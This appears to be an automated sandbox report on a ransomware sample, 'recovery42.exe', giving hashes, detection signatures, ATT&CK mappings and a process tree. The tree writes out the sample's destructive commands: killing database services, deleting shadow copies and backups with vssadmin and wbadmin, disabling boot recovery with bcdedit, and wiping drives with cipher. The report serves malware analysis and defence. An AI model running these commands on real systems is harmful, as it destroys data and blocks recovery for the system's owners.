Analysis
-
max time kernel
149s -
max time network
98s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
-
submitted
26-10-2024 16:47
General
-
Target
recovery42.exe
-
Size
419KB
-
MD5
68e664c654bcf9d558fb7b4f8da1f28d
-
SHA1
9deb213f58e48725bcc7974460b5e22cc3866cc1
-
SHA256
cb03c1677c165261557f0710ddc2e39790acac48ef038c71358ab5ad4f366cca
-
SHA512
5099414230ceb6c2903085f83f0cd267d7d9362f3c591681979119e52add81c31b032d95f477f7dc503d25da10a9e486b430336a58289b8297e1d79d190ab596
-
SSDEEP
6144:4CmPvkrISw8ZMQsFMFEXmtT+n4CQi2oD9HoZwIYaTR/dXszI2lUC40:L3W6MoFlV+n4CQRoD9IygT/L+
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Renames multiple (178) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 14 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\recovery42.exe"C:\Users\Admin\AppData\Local\Temp\recovery42.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sql writer.exe5⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlserv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -impostgres.exe5⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop REportServer$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet4⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet5⤵
- Deletes system backups
- Drops file in Windows directory
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No5⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\A:3⤵
- Enumerates connected drives
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\F:3⤵
- Enumerates connected drives
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\C:3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\recovery42.exe\\?\C:\Users\Admin\AppData\Local\Temp\recovery42.exe -network2⤵
- Adds Run key to start application
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Defense Evasion
Direct Volume Access
1Indicator Removal
4File Deletion
4Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD5b5222a512450decc0f6047b1435a55c0
SHA1bae1e1924984645e60925bf986c55e7d6f46c07c
SHA25618df1e012e65fba7a0db7ab28f319aeb383dbc92b30fa80ceb8f5a7f93b83f4c
SHA512f523c70a3840dffef33f393d17aaa70730f516c08e23a1fc0444eec7b65417ad94f795c8110e6fc10f62fc4f811ed24a480efec5b38e812428153088a49bfca4
-
Filesize
65KB
MD5af535afdc0c3299dcf68e5e77fe60482
SHA1ad1fe8af65de8b2fb3294aa829d5bbf14eb80344
SHA25644383af5218e5cf33588369b6898f080eade4c0c2592ab873838271297edd5bf
SHA512e7f802da00c5f16bfb6f44e8eecf05503992f126f1d67483832a00a9912ce06a3b541f804ccf49d090561d0367dceea047635c18eab9ae356644108f4c524a5a
-
Filesize
2KB
MD57faa909c952c7cbaeb0ec3f5e3a77a64
SHA10a029b4e2dc1ecdd6f411ef59ad0fd07ae615ebd
SHA2560dbae7fb280581db28fd70aa3e1650e08cd8b2d216b839b9ea4d0cbd0f724034
SHA5128967c358e2644f83a4e404c95fbcea8eed57b3e9599699054937226e6c6bb04dfd647405e47410373fd020936a6aed2210f543ed7d680025f96a3a5c8888cb3c
-
Filesize
626KB
MD5757e0f97e8ab6f408eb2fce08b129a30
SHA18c28f2561891155c59d1d48662ff812dc9c66d61
SHA256f57b3be280d96d6c7f800eb7385355aa682dc2280b6900b9b025ee2652ea2fb1
SHA512bbffbca025a4f737ee8be07c89d567b16f5b892a06225d2b277f6d13eac19a46b379a17ca49c0b1c84f86da0b499fcea911cfefa1d06e1731c966d5dfd4dac58